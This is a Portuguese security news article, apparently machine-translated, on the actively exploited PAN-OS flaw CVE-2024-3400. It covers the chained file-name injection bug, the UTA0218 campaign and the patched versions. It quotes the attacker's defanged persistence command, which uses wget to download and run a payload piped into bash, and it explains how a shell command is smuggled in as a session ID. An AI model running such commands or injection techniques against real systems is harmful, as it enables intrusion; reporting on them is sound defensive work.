Palo Alto Networks divulga mais detalhes sobre falha crítica do PAN-OS
A Palo Alto Networks compartilhou mais detalhes sobre uma falha crítica de segurança que afeta o PAN-OS e que está sob exploração ativa por agentes mal-intencionados.
A empresa descreveu a vulnerabilidade, rastreada como CVE-2024-3400 (pontuação CVSS: 10,0), como “complexo” e uma combinação de dois bugs nas versões PAN-OS 10.2, PAN-OS 11.0 e PAN-OS 11.1 do software program.
“No primeiro, o serviço GlobalProtect não validou suficientemente o formato do ID da sessão antes de armazená-los. Isso permitiu ao invasor armazenar um arquivo vazio com o nome de arquivo escolhido pelo invasor”, Chandan BN, diretor sênior de segurança de produto da Palo Alto Networks, disse.
“O segundo bug (confiar que os arquivos foram gerados pelo sistema) usava os nomes dos arquivos como parte de um comando.”
É importante notar que, embora nenhum dos problemas seja crítico o suficiente por si só, quando encadeados, eles podem levar à execução remota não autenticada de comandos do shell.
A Palo Alto Networks disse que o agente da ameaça por trás da exploração de dia zero da falha, UTA0218, realizou um ataque em dois estágios para conseguir a execução de comandos em dispositivos suscetíveis. A atividade está sendo rastreada sob o nome de Operação MidnightEclipse.
Conforme divulgado anteriormente pela Volexity e pela própria divisão de inteligência de ameaças Unit 42 da empresa de segurança de rede, isso envolve o envio de solicitações especialmente criadas contendo o comando a ser executado, que é então executado por meio de um backdoor chamado UPSTYLE.
“O mecanismo de persistência inicial configurado pelo UTA0218 envolveu a configuração de um cron job que usaria o wget para recuperar uma carga útil de uma URL controlada pelo invasor com sua saída sendo gravada em stdout e canalizada para bash para execução”, observou Volexity na semana passada.
“O invasor usou esse método para implantar e executar comandos específicos e baixar ferramentas de proxy reverso, como GOST (GO Easy Tunnel).”
A Unidade 42 disse que não foi capaz de determinar os comandos executados através deste mecanismo – wget -qO- hxxp://172.233.228(.)93/coverage | bash – mas avaliou que o implante baseado em cron job é provavelmente usado para realizar atividades pós-exploração.
“No estágio 1, o invasor envia um comando shell cuidadosamente elaborado em vez de um ID de sessão válido para o GlobalProtect”, explicou Chandan. “Isso resulta na criação de um arquivo vazio no sistema com um comando incorporado como nome de arquivo, escolhido pelo invasor.”
“No estágio 2, um trabalho de sistema agendado desavisado que é executado regularmente usa o nome de arquivo fornecido pelo invasor em um comando. Isso resulta na execução do comando fornecido pelo invasor com privilégios elevados.”
Embora a Palo Alto Networks tenha notado inicialmente que a exploração bem-sucedida do CVE-2024-3400 exigia as configurações de firewall para o gateway GlobalProtect ou portal GlobalProtect (ou ambos) e a telemetria do dispositivo habilitada, a empresa confirmou desde então que a telemetria do dispositivo não tem influência no problema.
Isso se baseia em novas descobertas do Bispo Fox, que descobriu desvios para transformar a falha em uma arma, de modo que não fosse necessária a ativação da telemetria em um dispositivo para se infiltrar nele.
A empresa também expandiu os patches para a falha nos últimos dias para cobrir outras versões de manutenção comumente implantadas –
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
À luz do abuso ativo do CVE-2024-3400 e da disponibilidade de um código de exploração de prova de conceito (PoC), recomenda-se que os usuários tomem medidas para aplicar os hotfixes o mais rápido possível para se protegerem contra ameaças potenciais.
A Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA) também adicionou a deficiência ao seu catálogo de Vulnerabilidades Exploradas Conhecidas (KEV), ordenando que as agências federais protejam seus dispositivos até 19 de abril de 2024.
De acordo com Informação compartilhado pela Shadowserver Basis, aproximadamente 22.542 dispositivos de firewall expostos à Web são provavelmente vulneráveis ao CVE-2024-3400. A maioria dos dispositivos está nos EUA, Japão, Índia, Alemanha, Reino Unido, Canadá, Austrália, França e China em 18 de abril de 2024.